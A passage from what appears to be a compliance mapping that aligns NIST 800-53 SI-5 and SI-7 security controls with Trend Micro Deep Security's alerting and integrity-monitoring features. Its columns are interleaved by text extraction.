compromised. IOCs for the discovery of compromised hosts can include for example, the
creation of registry key values. IOCs for network traffic include, for example, Universal
Resource Locator (URL) or protocol elements that indicate malware command and control
servers. The rapid distribution and adoption of IOCs can improve information security by
reducing the time that information systems and organizations are vulnerable to the same
exploit or attack.
SI-5 System and Information Integrity / Security Alerts, Advisories and Directives
SI-5 System and Information Integrity / Security Alerts, Advisories, and Directives P1 Deep Security can assist in supporting this control by providing security alerts to the
The organization: LMH organization and security alert data can be exported to syslog servers. The
a) Receives information system security alerts, advisories, and directives from
frequency of alerts is configurable.
CNSSI
[Assignment: organization-defined external organizations] on an ongoing basis;
b) Generates internal security alerts, advisories, and directives as deemed necessary;
c) Disseminates security alerts, advisories, and directives to: [Selection (one or more):
[Assignment: organization-defined personnel or roles]; [Assignment: organization-
defined elements within the organization]; [Assignment: organization-defined external
organizations]]; and
d) Implements security directives in accordance with established time frames, or notifies
the issuing organization of the degree of noncompliance.
Supplemental Guidance:
The United States Computer Emergency Readiness Team (US-CERT) generates security
alerts and advisories to maintain situational awareness across the federal government.
Security directives are issued by OMB or other designated organizations with the
responsibility and authority to issue such directives. Compliance to security directives is
essential due to the critical nature of many of these directives and the potential immediate
adverse effects on organizational operations and assets, individuals, other organizations,
and the Nation should the directives not be implemented in a timely manner. External
organizations include, for example, external mission/business partners, supply chain
partners, external service providers, and other peer/supporting organizations. Related
control: SI-2.
SI-5 (1) System and Information Integrity / Security Alerts, Advisories, and Directives /
Automated Alerts and Advisories P1
The organization employs automated mechanisms to make security alert and advisory H
information available throughout the organization. CNSSI
Supplemental Guidance:
The significant number of changes to organizational information systems and the
environments in which those systems operate requires the dissemination of security-
related information to a variety of organizational entities that have a direct interest in the
success of organizational missions and business functions. Based on the information
provided by the security alerts and advisories, changes may be required at one or more of
the three tiers related to the management of information security risk including the
governance level, mission/business process/enterprise architecture level, and the
information system level.
SI-7 System and Information Integrity / Software, Firmware and Information Integrity
SI-7 System and Information Integrity / Software, Firmware, and Information Integrity P1 The Deep Security solution supports the integrity verification of software and
The organization employs integrity verification tools to detect unauthorized changes to MH information through the Integrity Monitoring functionality. Integrity Monitoring monitors
[Assignment: organization-defined software, firmware, and information]. critical system objects such as files, folders, registry entries, processes, services, and
CNSSI listening ports and will detect any changes that happen to critical system objects.
Supplemental Guidance: FedRAMP Integrity Monitoring works by comparing the current condition of a monitored-object
Unauthorized changes to software, firmware, and information can occur due to errors or with an existing baseline. When an integrity event occurs with a rule that has the alert
malicious activity (e.g., tampering). Software includes, for example, operating systems feature enabled, it will generate an alert to the Deep Security administrator. Baselines
(with key internal components such as kernels, drivers), middleware, and applications. are created when the integrity rule is assigned. The baseline snapshot is stored in the
Firmware includes, for example, the Basic Input Output System (BIOS). Information DSA or the DSVA, in the virtualized environment, as a SQLLite3 DB file using hashes,
includes metadata such as security attributes associated with information. State-of-the- which is uploaded to the DSM. Baselines consist of a combination of the following
practice integrity-checking mechanisms (e.g., parity checks, cyclical redundancy checks, object attributes; Created, Last Modified, Last Accessed, Permissions, Owner, Group,
cryptographic hashes) and associated tools can automatically monitor the integrity of Size, Hash (SHA1,SHA256,MD5), Flags, SymLinkPath, Inode Number, Device
information systems and hosted applications. Related controls: SA-12, SC-8, SC-13, SI-3. Number, Blocks Allocated.
Triggers are used to compare the monitored system object and it's baseline. The
SI-7 (1) System and Information Integrity / Software, Firmware, and Information Integrity P1 triggers can be Manual; Real-time On Change; and Pseudo real-time. The Manual or
/ Integrity Checks On demand trigger is an administrator initiated comparison triggered from the DSM
MH
The information system performs an integrity check of [Assignment: organization-defined console. The On-Change trigger uses the ReadDirectoryChanges function in the
CNSSI Windows API to alert an administrator that a modification to a security critical object
software, firmware, and information] [Selection (one or more): at startup; at [Assignment:
organization- defined transitional states or security-relevant events]; [Assignment: FedRAMP being monitored has taken place. The Pseudo-real time change is carried out by
organization-defined frequency]]. constant scans of the host machine for changes to the security critical objects being
monitored. An algorithm is used to determine the appropriate scanning interval based
Supplemental Guidance: on how long it takes to scan all systems areas. This prevents scans overwhelming the
Security-relevant events include, for example, the identification of a new threat to which host machine.
organizational information systems are susceptible, and the installation of new hardware,
software, or firmware. Rules: Administrators can use built-in templates to monitor files, directories, and
Transitional states include, for example, system startup, restart, shutdown, and abort. Registry entries. Custom rules can be written to cover: Listening ports, Processes and
Services
SI-7 (3) System and Information Integrity / Software, Firmware, and Information Integrity Rules can be developed by the administrator to monitor the Service Attributes such
/ Centrally Managed Integrity Tools as: Permissions; Owner; Group; BinaryPathName; Description; State; StartType;
LogOnAs; FirstFailure; SecondFailure; SubsequentFailures; ResetFailCountAfter;
The organization employs centrally managed integrity verification tools. RunProgram; DependsOn; LoadOrderGroup; ProcessID; and Changes to registry
Supplemental Guidance: Related controls: AU-3, SI-2, SI-8. service keys.
The Deep Security Agent and Deep Security Manager components use a SHA256
checksum when the components are downloaded from the Trend Micro product
SI-7 (5) System and Information Integrity / Software, Firmware, and Information Integrity P1 download web site.
/ Automated Response to Integrity Violations H
The information system automatically [Selection (one or more): shuts the information CNSSI
system down; restarts the information system; implements [Assignment: organization-
defined security safeguards]] when integrity violations are discovered.
Supplemental Guidance:
Organizations may define different integrity checking and anomaly responses: (i) by type of
information (e.g., firmware, software, user data); (ii) by specific information (e.g., boot
firmware, boot firmware for a specific types of machines); or (iii) a combination of both.
Automatic implementation of specific safeguards within organizational information systems
includes, for example, reversing the changes, halting the information system, or triggering
audit alerts when unauthorized modifications to critical security files occur.
SI-7 (8) System and Information Integrity / Software, Firmware, and Information Integrity
/ Auditing Capability for Significant Events CNSSI
The information system, upon detection of a potential integrity violation, provides the
capability to audit the event and initiates the following actions: [Selection (one or more):
generates an audit record; alerts current user; alerts [Assignment: organization-defined
personnel or roles]; [Assignment: organization-defined other actions]].
Supplemental Guidance:
Organizations select response actions based on types of software, specific software, or
information for which there are potential integrity violations. Related controls: AU-2, AU-6,
AU-12.
SI-7 (13) System and Information Integrity / Software, Firmware, and Information Integrity The Deep Security solution supports compliance to this requirement by providing a
/ Code Execution In Protected Environments series of security mechanisms in the physical or virtualized environment, which can
The organization allows execution of binary or machine- executable code obtained from be configured to provide the isolation required from other systems environments, such
sources with limited or no warranty and without the provision of source code only in as Dev/Test/Production, to run binaries from sources with limited or no warranty and
without the availability of the source code.
confined physical or virtual machine environments and with the explicit approval of
[Assignment: organization-defined personnel or roles].
Supplemental Guidance:
This control enhancement applies to all sources of binary or machine-executable code
including, for example, commercial software/firmware and open source software.